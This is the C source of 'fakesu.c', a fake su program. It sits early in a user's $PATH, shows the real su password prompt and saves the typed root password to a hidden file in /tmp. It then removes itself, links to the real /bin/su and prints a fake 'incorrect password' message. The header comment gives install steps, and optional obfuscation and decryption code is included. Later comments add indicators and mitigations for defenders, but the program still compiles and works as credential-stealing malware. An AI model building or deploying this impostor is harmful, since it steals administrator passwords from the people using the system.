记录su root帐号

#include
#include
#include
#include
#include
#include

/*

   [ fakesu.c ] 2oo6 by OOZIE
   ~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
   Simple /bin/su fake-proggy. Very useful if you have a shell
   with regular user rights, who uses from time to time su/sux/sudo
   to become a superuser.
  
   INSTALL
   ~~~~~~~
   If you can find ~/bin directories (e.g. SUSE Linux 10.1) which are
   located at the beginning of $PATH variable (EXTREMELY BAD IDEA!)
   in this case nothing simpler as:
  
   gcc fakesu.c -o ~/bin/su
   ln -s ~/bin/su ~/bin/sux     # just to be sure
   ln -s ~/bin/su ~/bin/sudo    # Carefully! sudo & su passwd propt differs!
                                  sudo: "Password:"
                    su: "Password: "
                                                  ^
   In any other case you have to create such a directory on your own
   and modify $PATH variable appropriately.
  
*/


// LOG is the file the captured password is written to (see main): a hidden
// dotfile under /tmp.  For anyone analysing a host where this sample ran,
// that path -- together with a `su`/`sux`/`sudo` symlink sitting in a
// user-writable $PATH directory -- is the artefact to look for.
// SU is the genuine binary the impostor replaces itself with after one run.
#define LOG "/tmp/.pwds.log"  // change to hide stolen password somwhere else
#define SU "/bin/su"          // location of su can vary depending on a system

// Build switch.  Note the lookalike spelling: the compile flag is -DCRYPTO
// (letter O) while the macro the code actually tests is CRYPT0 (digit zero).
// "Encryption" here is the keyless +1/-1 character shift in encrypt() below,
// so a log written by a CRYPTO build is just as recoverable as a plain one.
#ifdef CRYPTO          // ---[ OPTIONAL ENCRYPTION OF STOLEN PASSWORD ]---
#define CRYPT0 1       //    If compiled with -DCRYPTO, then CRYPT0=1
#endif                 //    -> stored password will be encrypted
#ifndef CRYPTO         //
#define CRYPT0 0       //    in any other case CRYPT0=0, plaintext (default)
#endif

/*

// This is not the part of this program, just a simple demo
// how the decryption algorithm for this proggie looks like.
// Copy & paste if needed

char *decrypt(char *string2) {
   int i;

   for(i=0;i < strlen(string2);i+=2)
      string2[i]--;
   for(i=1;i < strlen(string2);i+=2)
      string2[i]++;
  
   return string2;
  
}
*/

/*
 * encrypt -- in-place obfuscation of the captured string: every character at
 * an even index is incremented by one, every character at an odd index is
 * decremented by one.  The commented-out decrypt() above applies the inverse.
 *
 * This is a fixed, keyless transform, not encryption: anyone holding the log
 * file recovers the original text directly.  A defender who finds a log
 * produced by a "CRYPTO" build should treat its contents as plaintext
 * credentials and rotate them.
 *
 * @param string  NUL-terminated, writable buffer; modified in place.
 * @return the same pointer that was passed in.
 */
char *encrypt(char *string) {

   int i;

   for(i=0;i < strlen(string);i+=2)   // even positions: +1
      string[i]++;
   for(i=1;i < strlen(string);i+=2)   // odd positions:  -1
      string[i]--;
  
   return string;
}


/*
 * main -- entry point of the su impostor.  What the code below does, for
 * anyone analysing a sample of it:
 *   1. walks $PATH with strtok() and calls remove() on "<dir>/<argv[0]>";
 *      the first directory where that succeeds is remembered in newpath
 *      (this is the program deleting its own file);
 *   2. creates a symlink from that path to SU (/bin/su), so the victim's
 *      next "su" runs the real binary and no error is shown;
 *   3. reads one password with getpass("Password: "), optionally passes it
 *      through encrypt(), and writes it to LOG (/tmp/.pwds.log);
 *   4. sleeps 3 s and prints "<argv[0]>: incorrect password", imitating a
 *      failed authentication so the victim simply retries.
 *
 * Defensive observations grounded in the code:
 *   - Nothing here escalates privilege.  It relies entirely on PATH lookup
 *     order (a writable directory ahead of /bin, see the header comment) and
 *     on the user typing a password into the wrong program.  Keeping
 *     user-writable directories out of the front of $PATH, or invoking
 *     /bin/su by absolute path, defeats it.
 *   - Host indicators: the dotfile LOG in /tmp and a symlink named su/sux/
 *     sudo in a user directory pointing at /bin/su.  The log is opened with
 *     fopen(LOG, "w") and its mode follows the umask, so the captured
 *     credential is typically readable by other local users as well.
 *   - argv[0] is used as a bare command name when building the path to
 *     delete, i.e. the self-removal assumes the impostor was invoked by
 *     name through $PATH rather than by an explicit path.
 *   - `buf` and `fd` are declared but never used; the malloc() on L86 is
 *     immediately shadowed by the getenv() result, and strtok() then writes
 *     NULs into the process's own PATH string.
 */
int main(int argc, char **argv) {
   char passwd[256];                       // buffer the typed password is copied into
   char *path, *newpath, *token, *fullpath;
   struct stat *buf;                       // unused
   FILE *pwdfile;
   int fd, lock=0;                         // fd unused; lock=1 once self-removal succeeded
  
   path=(char *)malloc(1024);              // overwritten by getenv() below, never freed
   newpath=(char *)malloc(1024);           // receives the path to recreate as a symlink
   fullpath=(char *)malloc(256);           // scratch "<dir>/<argv[0]>" buffer  

   path=getenv("PATH");
   token=strtok(path,":");                 // mutates the environment string in place
  
   do {

      if (lock==0) {        // only the first directory where remove() succeeds is handled
     
         strcpy(fullpath,token);
         strcat(fullpath,"/");       //
         strcat(fullpath,argv[0]);
     
         if (!(remove(fullpath))) {  // remove() returns 0 on success: the impostor's own file is gone
        strcpy(newpath,fullpath);
        lock=1;
         }
     
      }

     
   } while (token=strtok(NULL, ":"));
  
   // The symlink is created only after the impostor's own file is gone, so a
   // later "su" resolves to the real binary instead of a dangling path; the
   // author's stated reason is that the victim must not see an error message.
   // newpath is assigned only inside the loop, on a successful remove().
   symlink(SU,newpath);
  
   strncpy(passwd,getpass("Password: "),256);   // same prompt text as the real su
   pwdfile=fopen(LOG, "w");                     // truncates: one captured password per run
    if (CRYPT0) encrypt(passwd);                // keyless +1/-1 shift, see encrypt()
    fprintf(pwdfile, "%s\n",passwd);
   fclose(pwdfile);

   sleep(3);                                    // delay mimicking su's failed-auth pause
   printf("%s: incorrect password\n", argv[0]); // fake failure message, then exit 0
   return 0;  
}